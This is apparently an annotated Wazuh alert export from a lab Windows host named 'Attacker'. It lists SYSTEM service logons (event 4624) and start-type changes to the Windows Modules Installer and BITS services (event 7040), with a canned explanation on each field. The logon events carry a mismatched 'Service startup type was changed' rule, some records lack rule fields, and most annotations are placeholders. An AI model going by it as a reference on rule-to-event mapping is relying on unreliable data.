id: 1745533899.223443 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:35.6633235Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43515 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 6624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533903.230779 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:54:27.8966188Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2949 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10448 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Windows Modules Installer No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: TrustedInstaller No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533903.232559 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:54:42.4352316Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2950 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11352 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from demand start to auto start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Windows Modules Installer No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: TrustedInstaller No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.234339 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:37.9843227Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43519 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 9432 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 7 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.241675 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:22.6696087Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2951 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10448 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Background Intelligent Transfer Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: BITS No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Service startup type was changed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61104 Numeric ID of the detection rule that fired.
rule.info: This does not appear to be logged on Windows 2000 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.firedtimes: 8 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'policy_changed'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.pci_dss: ['10.6'] PCI DSS mapping – card‑holder data rules.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
rule.nist_800_53: ['AU.6'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.243487 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {555908d1-a6d7-4695-8e1e-26931d2012f4} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Service Control Manager No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 7040 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8080000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:55:28.8016634Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2952 Incremental log record number – handy for timeline order.
data.win.system.processID: 772 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10448 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The start type of the Windows Modules Installer service was changed from auto start to demand start." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param1: Windows Modules Installer No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param2: auto start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param3: demand start No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.param4: TrustedInstaller No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533904.245267 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:38.6466082Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43521 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8104 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
